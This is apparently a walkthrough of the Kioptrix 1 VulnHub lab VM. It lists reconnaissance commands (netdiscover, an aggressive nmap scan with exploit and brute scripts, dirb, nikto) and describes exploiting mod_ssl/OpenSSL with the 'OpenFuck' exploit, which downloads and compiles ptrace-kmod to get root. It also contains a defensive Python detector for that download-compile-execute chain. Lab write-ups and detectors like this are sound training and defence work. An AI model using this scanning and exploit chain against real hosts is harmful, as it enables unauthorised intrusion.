Kioptrix 1 Walkthrough

Kioptrix 1 VulnHub VM Walkthrough

I started the box with a netdiscover scan and found the IP was 192.168.0.130

netdiscover -r 192.168.0.0/24


Then ran an nmap scan and discovered some open ports

nmap -sV -Pn -vv -T4 -A -p- 192.168.0.130 --script=auth,brute,discovery,exploit,vuln -oN 192.168.0.130_nmap.scan


SSH version


Apache version, some OS info and mod_ssl/openssl version


An open RPC port


NetBIOS and https


I continued my enumeration by running dirb against the webserver

dirbuster


I found a site, the Multi-Router Traffic Grapher. I looked up associated vulnerabilities, but didn’t find much 🙁


A Nikto scan picked up a few Apache and OpenSSL vulnerabilities

nikto -h http://192.168.0.130/


I searched for possible exploits on Google and found a couple


I tried the second entry, openssl-scanner. The host came back as vulnerable!

This is a great tool if you have to scan an entire network quickly for this OpenSSL exploit.

I could use openssl-too-open and escalate privileges manually, but OpenFuck should do this for us 🙂


We execute openfuck with no options to find our OS/Apache version


We have to use 0x6b for the exploit to work, and chose 40 connections because the exploit doesn’t always take right away. After we connected to a shell, openfuck downloads, compiles and executes ptrace-kmod to attempt privilege escalation to root. In our case it worked!
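The chain described above (a shell under the web server account that downloads a source file, compiles it and runs the result) is a strong detection signal on the defending side. The following is an added example, not part of the original walkthrough or of any tool named in it: it scans constructed process-execution records for that chain. The record format, the account names, the sample URL and the five-minute window are all assumptions.

```python
import shlex
from datetime import datetime, timedelta

# Constructed process-execution records: "<timestamp> <user> <command line>".
# The format, the "apache" account and the .invalid URL are assumptions for this example.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 apache /bin/sh -i
2024-05-01T10:00:03 apache wget http://files.example.invalid/ptrace-kmod.c
2024-05-01T10:00:05 apache gcc -o p ptrace-kmod.c
2024-05-01T10:00:06 apache ./p
2024-05-01T10:02:00 alice gcc -o hello hello.c
2024-05-01T10:02:04 alice ./hello
2024-05-01T11:30:00 apache /usr/sbin/rotatelogs /var/log/httpd/access_log 86400
"""

SERVICE_ACCOUNTS = {"apache", "www-data", "nobody"}  # accounts that should never build code
DOWNLOADERS = {"wget", "curl", "fetch", "lynx"}
COMPILERS = {"gcc", "cc", "g++", "make"}
WINDOW = timedelta(minutes=5)  # maximum gap between consecutive steps of the chain

def basename(path):
    return path.rsplit("/", 1)[-1]

def detect_chains(log_text):
    """Alert when a service account downloads, compiles, then runs the build output."""
    state, alerts = {}, []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, cmdline = line.split(" ", 2)
        if user not in SERVICE_ACCOUNTS:
            continue
        when, argv = datetime.fromisoformat(ts), shlex.split(cmdline)
        prog = basename(argv[0])
        st = state.setdefault(user, {"download": None, "output": None, "built": None})
        if prog in DOWNLOADERS:
            st.update(download=when, output=None, built=None)
        elif prog in COMPILERS and st["download"] and when - st["download"] <= WINDOW:
            # Remember the compiler's output name; a.out is the default without -o
            out = argv[argv.index("-o") + 1] if "-o" in argv[:-1] else "a.out"
            st.update(output=basename(out), built=when)
        elif st["output"] == prog and when - st["built"] <= WINDOW:
            alerts.append({"user": user, "binary": prog, "time": ts,
                           "reason": "download -> compile -> execute by service account"})
            state[user] = {"download": None, "output": None, "built": None}
    return alerts

if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert)
```

On the sample records only the apache chain is reported; the interactive user's compile-and-run and the later rotatelogs invocation are ignored.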


After getting root, I looked around the box for anything interesting… I noticed some files in /var/mail/ for a couple users on the box

After cding to the dir, I found a file named "root" which congratulated me for rooting the Vulnerable VM!
